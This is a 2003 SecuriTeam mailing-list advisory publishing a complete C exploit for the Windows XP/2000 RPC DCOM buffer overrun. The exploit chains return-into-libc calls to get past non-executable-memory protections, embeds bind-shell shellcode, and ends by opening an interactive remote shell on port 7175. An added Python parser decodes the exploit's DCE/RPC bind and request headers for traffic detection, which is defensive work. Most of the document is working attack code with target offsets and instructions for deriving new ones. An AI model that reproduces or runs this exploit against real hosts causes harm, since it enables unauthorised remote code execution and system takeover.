[EXPL] Microsoft Windows XP/2000 Remote Return into Libc Exploit (RPC, DCOM)
From: SecuriTeam (support_at_securiteam.com)
Date: 11/09/03
To: list@securiteam.com Date: 9 Nov 2003 19:44:44 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Microsoft Windows XP/2000 Remote Return into Libc Exploit (RPC, DCOM)
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article, <http://www.securiteam.com/securitynews/5LP0B0AB5C.html> (Buffer Overrun In RPCSS Service Could Allow Code Execution), a vulnerability in the RPC server allows remote attackers to cause the service to execute arbitrary code. The following exploit code can be used to test your system for the mentioned vulnerability, and it still works where the protection products OverflowGuard or StackDefender have been installed: it is a return-into-libc exploit, so it returns into existing library code instead of jumping straight into the injected buffer, which is what those non-executable-memory schemes are built to stop.
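The exploit's first network step is a DCE/RPC bind to the ISystemActivator interface on TCP port 135, followed by a request into which the payload has been spliced. The parser below is an added example (not part of the original exploit or of SecuriTeam's text) that decodes those two PDU headers from the exploit's own bindstr and request1 bytes, so the exchange can be recognised in captured traffic; field offsets follow the DCE/RPC connection-oriented PDU layout.

```python
import struct
import uuid

# Interface UUID carried in the advisory's bindstr: ISystemActivator, the DCOM
# activation interface on TCP 135 through which the RPCSS overrun is reached.
ISYSTEMACTIVATOR = uuid.UUID("000001a0-0000-0000-c000-000000000046")
PTYPE_REQUEST, PTYPE_BIND = 0x00, 0x0B

def parse_header(pdu):
    """Decode the 16-byte DCE/RPC connection-oriented common header."""
    if len(pdu) < 16 or pdu[0] != 5:
        raise ValueError("not a DCE/RPC v5 PDU")
    end = "<" if (pdu[4] >> 4) == 1 else ">"   # packed_drep 0x10 = little-endian
    frag_len, auth_len, call_id = struct.unpack(end + "HHI", pdu[8:16])
    return {"ptype": pdu[2], "flags": pdu[3], "end": end,
            "frag_len": frag_len, "auth_len": auth_len, "call_id": call_id}

def bind_interfaces(pdu):
    """Abstract-syntax UUIDs a bind PDU asks for (empty list if not a bind)."""
    hdr = parse_header(pdu)
    if hdr["ptype"] != PTYPE_BIND:
        return []
    ifaces, pos = [], 28                 # p_context_elem list starts at offset 28
    for _ in range(pdu[24]):             # n_context_elem
        n_ts = pdu[pos + 2]              # transfer syntaxes offered for this context
        raw = pdu[pos + 4:pos + 20]      # abstract syntax interface UUID
        ifaces.append(uuid.UUID(bytes_le=raw) if hdr["end"] == "<" else uuid.UUID(bytes=raw))
        pos += 24 + 20 * n_ts            # 4 ctx header + 20 abstract + 20 per transfer syntax
    return ifaces

def request_opnum(pdu):
    """(opnum, declared frag_length) of a request PDU, or None if not a request."""
    hdr = parse_header(pdu)
    if hdr["ptype"] != PTYPE_REQUEST or len(pdu) < 24:
        return None
    return struct.unpack(hdr["end"] + "H", pdu[22:24])[0], hdr["frag_len"]

def is_isystemactivator_bind(pdu):
    """True when a bind PDU targets ISystemActivator, the first step of this exploit."""
    return ISYSTEMACTIVATOR in bind_interfaces(pdu)

# Sample input taken from the exploit source: its 72-byte bindstr and the first
# 24 bytes of request1 (the request into which main() splices the payload).
BIND_PDU = bytes.fromhex(
    "05000b0310000000480000007f000000" "d016d016000000000100000001000100"
    "a001000000000000c000000000000046" "00000000045d888aeb1cc9119fe80800"
    "2b10486002000000")
REQ_HDR = bytes.fromhex("0500000310000000e8030000e5000000" "d003000001000400")

if __name__ == "__main__":
    print("bind to ISystemActivator:", is_isystemactivator_bind(BIND_PDU))   # True
    print("request opnum, frag_len:", request_opnum(REQ_HDR))                 # (4, 1000)
```

A bind to ISystemActivator is also normal DCOM activation traffic, so on its own it is only the first half of a detector; the distinguishing part is the opnum 4 request that follows, whose fragment length this exploit grows by the size of its payload.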
DETAILS
Exploit:
/*
* have you recently bought one of those expensive new windows security products
* on the market? do you think you now have strong protection?
* Look again:
*
* *rpc!exec*
* by ins1der (trixterjack yahoo com)
*
* windows remote return into libc exploit!
*
* remote rpc exploit breaking non exec memory protection schemes
* tested against :
* OverflowGuard
* StackDefender (kernel32 imagebase randomization:O nice try guys.)
*
*
* currently breaking:
* Windows 2000 SP0 (english)
* Windows XP SP0 (english)
*
* to get new offsets use this:
* ------------------------------
* #include <windows.h>
* #include <stdio.h>
*
* int main()
* {
* HANDLE h1,h2;
* unsigned long addr1,addr2,addr3,addr4;
* h1=LoadLibrary("ntdll.dll");
* h2=LoadLibrary("MSVCRT.dll");
* addr1=(unsigned long)GetProcAddress(h1,"NtAllocateVirtualMemory");
* addr2=(unsigned long)GetProcAddress(h2,"memcpy");
* addr3=(unsigned long)GetProcAddress(h1,"NtProtectVirtualMemory");
* for (addr4=addr1;addr4<addr1+0xffff;addr4++)
* {
* if (!memcmp((void*)addr4,"\xc9\xc3",2)) break;
* }
* printf("0x%x 0x%x 0x%x 0x%x\n",addr1,addr2,addr3,addr4);
* return 0;
* }
* -----------------------------
* to get the last offset use a standard rpc dcom exploit with the last
* \x90\x90 before the shellcode replaced with \xcd\x21. run the exploit
* and read the drwatson logs. subtract 0xA5 from the fault address.
*
*
* Shouts go to:
* w00pz, SpaceCow, Int3, lacroix, misu200, j00(xor),
* s0ny, crisis, and to all my true friends.
*
*
* Enjoy!
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* this code assumes a 32-bit build (sizeof(unsigned long) == 4):
 the structures below are laid out as consecutive 4-byte fields */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
unsigned char request3[]={
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
unsigned char request4[]={
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
struct offset
{
    char *description;
    unsigned long valloc;    /* NtAllocateVirtualMemory (addr1 in the header comment) */
    unsigned long amemcpy;   /* memcpy in MSVCRT (addr2) */
    unsigned long vprot;     /* NtProtectVirtualMemory (addr3) */
    unsigned long ret;       /* address of the \xc9\xc3 bytes in ntdll (addr4) */
    unsigned long frame;     /* the last offset, taken from the drwatson log */
};

struct offset targets[]=
{
    {"Windows 2000 SP0 (english)", 0x77f95da9, 0x78001194, 0x77f82ffb, 0x77f96800, 0x52f770},
    {"Windows XP SP0 (english)",   0x77f7e4c3, 0x77c42e10, 0x77f7ec43, 0x77f80a07, 0x5bf79c},
    {NULL,0,0,0,0,0}
};
unsigned char shell[]=
"\x46\x00\x58\x00"
"\x4E\x00\x42\x00"
"\x46\x00\x58\x00"
"\x46\x00\x58\x00"
"\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xcc\xe0\xfd\x7f"
"\xcc\xe0\xfd\x7f"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x83\xec\x34\x8b\xf4\xe8\x47\x01\x00\x00\x89\x06\xff\x36\x68\x8e"
"\x4e\x0e\xec\xe8\x61\x01\x00\x00\x89\x46\x08\xff\x36\x68\xad\xd9"
"\x05\xce\xe8\x52\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00\x00\x68"
"\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89\x46\x04"
"\xff\x36\x68\x72\xfe\xb3\x16\xe8\x2d\x01\x00\x00\x89\x46\x10\xff"
"\x36\x68\xef\xce\xe0\x60\xe8\x1e\x01\x00\x00\x89\x46\x14\xff\x76"
"\x04\x68\xcb\xed\xfc\x3b\xe8\x0e\x01\x00\x00\x89\x46\x18\xff\x76"
"\x04\x68\xd9\x09\xf5\xad\xe8\xfe\x00\x00\x00\x89\x46\x1c\xff\x76"
"\x04\x68\xa4\x1a\x70\xc7\xe8\xee\x00\x00\x00\x89\x46\x20\xff\x76"
"\x04\x68\xa4\xad\x2e\xe9\xe8\xde\x00\x00\x00\x89\x46\x24\xff\x76"
"\x04\x68\xe5\x49\x86\x49\xe8\xce\x00\x00\x00\x89\x46\x28\xff\x76"
"\x04\x68\xe7\x79\xc6\x79\xe8\xbe\x00\x00\x00\x89\x46\x2c\x33\xff"
"\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x8b\xd8\x57\x57\x68\x02"
"\x00\x1c\x07\x8b\xcc\x6a\x16\x51\x53\xff\x56\x20\x57\x53\xff\x56"
"\x24\x57\x51\x53\xff\x56\x28\x8b\xd0\x68\x65\x78\x65\x00\x68\x63"
"\x6d\x64\x2e\x89\x66\x30\x83\xec\x54\x8d\x3c\x24\x33\xc0\x33\xc9"
"\x83\xc1\x15\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89"
"\x54\x24\x48\x89\x54\x24\x4c\x89\x54\x24\x50\x8d\x44\x24\x10\x54"
"\x50\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x8b"
"\xcc\x6a\xff\xff\x31\xff\x56\x0c\x8b\xc8\x57\xff\x56\x2c\xff\x56"
"\x14\x55\x56\x64\xa1\x30\x00\x00\x00\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09\x8b\x40\x34\x8b\xa8\xb8\x00"
"\x00\x00\x8b\xc5\x5e\x5d\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24"
"\x18\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b\x5a\x20"
"\x03\xdd\xe3\x32\x49\x8b\x34\x8b\x03\xf5\x33\xff\xfc\x33\xc0\xac"
"\x3a\xc4\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf2\x3b\x7c\x24\x14\x75"
"\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b"
"\x04\x8b\x03\xc5\xeb\x02\x33\xc0\x8b\xd5\x5f\x5e\x5d\x5b\xc2\x04"
"\x00\x90\x90\x90\x80\xbf\x32\x94\x80\xbf\x32\x94";
struct frame1
{
    unsigned long frame0;
    unsigned long ret;
} fr1;

/* three chained fake frames, one per library call named in the header comment */
struct retstruct
{
    unsigned long frame1;
    unsigned long valloc;
    unsigned long ret1;
    unsigned long dummy1;
    unsigned long pointer11;
    unsigned long zero;
    unsigned long pointer12;
    unsigned long type;
    unsigned long prot;
    unsigned long frame2;
    unsigned long amemcpy;
    unsigned long ret2;
    unsigned long dest;
    unsigned long src;
    unsigned long size2;
    unsigned long frame3;
    unsigned long vprot;
    unsigned long ret3;
    unsigned long dummy2;
    unsigned long pointer21;
    unsigned long pointer22;
    unsigned long newprot;
    unsigned long oldprot;
} rets;
void prepare_ret(int id)
{
    rets.type=0x3000;
    rets.prot=0x4;
    rets.newprot=0x20;
    rets.valloc=targets[id].valloc;
    rets.amemcpy=targets[id].amemcpy;
    rets.vprot=targets[id].vprot;
    fr1.ret=rets.ret1=rets.ret2=targets[id].ret;
    fr1.frame0=targets[id].frame;
    rets.frame1=fr1.frame0+9*4;
    rets.frame2=rets.frame1+6*4;
    rets.oldprot=fr1.frame0;
    rets.frame3=rets.frame1;
    rets.size2=sizeof(shell);
    rets.src=fr1.frame0;
    rets.dest=0x55555000;
    rets.ret3=0x5555506c;
    rets.dummy1=rets.dummy2=0xffffffff;
    rets.zero=0;
    *(int*)(shell+148)=0x55555000;
    *(int*)(shell+152)=sizeof(shell);
    *(int*)(shell+140)=0x55555000;
    *(int*)(shell+144)=sizeof(shell);
    rets.pointer11=fr1.frame0+92;
    rets.pointer12=fr1.frame0+96;
    rets.pointer21=fr1.frame0+100;
    rets.pointer22=fr1.frame0+104;
    memcpy(shell+32,&fr1,sizeof(fr1));
    memcpy(shell+48,&rets,sizeof(rets));
}
void entershell(int sock)
{
    char buf[3000];
    fd_set fdr;
    int rs;
    FD_ZERO(&fdr);
    FD_SET(sock,&fdr);
    FD_SET(0,&fdr);
    for(;;)
    {
        FD_SET(sock, &fdr);
        FD_SET(0, &fdr);
        if(select(FD_SETSIZE,&fdr,NULL,NULL,NULL)<0) break;
        if(FD_ISSET(sock, &fdr))
        {
            if((rs=read(sock,buf,sizeof(buf)))<0)
            {
                printf("connection lost\n");
                return;
            }
            if(write(1,buf,rs)<0) break;
        }
        if(FD_ISSET(0,&fdr))
        {
            if((rs=read(0,buf,sizeof(buf)))<0)
            {
                printf("[-] Connection lost..\n");
                exit(1);
            }
            if (write(sock,buf,rs) < 0) break;
        }
        usleep(100);
    }
    printf("connection closed\n");
    return;
}
int main(int argc, char **argv)
{
    int sock,i,len1;
    struct sockaddr_in sin;
    unsigned char buf1[0x1000],buf2[0x1000];
    if(argc<3)
    {
        printf("###############################\n");
        printf("return into libc rpc exploit\n");
        printf("ins1der 2003\n");
        printf("downloaded on www.k-otik.com\n");
        printf("*****************************************\n");
        printf("usage: %s <ip> <id>\n", argv[0]);
        printf("*****************************************\n");
        printf("targets:\n");
        printf("-----------------------------------------\n");
        for (i=0;targets[i].description!= NULL;i++)
        {
            printf("%d\t%s\n",i,targets[i].description);
        }
        printf("-----------------------------------------\n");
        return 0;
    }
    printf("Exploiting %s...\n",argv[1]);
    prepare_ret(atoi(argv[2]));
    sin.sin_family=AF_INET;
    sin.sin_addr.s_addr=inet_addr(argv[1]);
    sin.sin_port=htons(135);
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
    {
        perror("socket ");
        return 0;
    }
    if(connect(sock,(struct sockaddr*)&sin, sizeof(sin)))
    {
        perror("connect ");
        return 0;
    }
    /* request = request1 + request2 + shell + request3 + request4,
       with the length fields patched to account for the inserted shell */
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(shell)/2;
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(shell)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,shell,sizeof(shell));
    len1=len1+sizeof(shell);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(shell)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(shell)-0xc;
    if (send(sock,(char*)bindstr,sizeof(bindstr),0)==-1)
    {
        perror("send");
        return 0;
    }
    recv(sock,(char*)buf1,1000,0);
    if (send(sock,(char*)buf2,len1,0)== -1)
    {
        perror("send");
        return 0;
    }
    close(sock);
    sleep(1);
    sin.sin_port = htons(7175);
    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("socket");
        return(0);
    }
    if(connect(sock,(struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
    {
        printf("Exploit failed\n");
        return(0);
    }
    printf("Entering shell\n");
    entershell(sock);
    return 1;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:trixterjack@yahoo com> ins1der.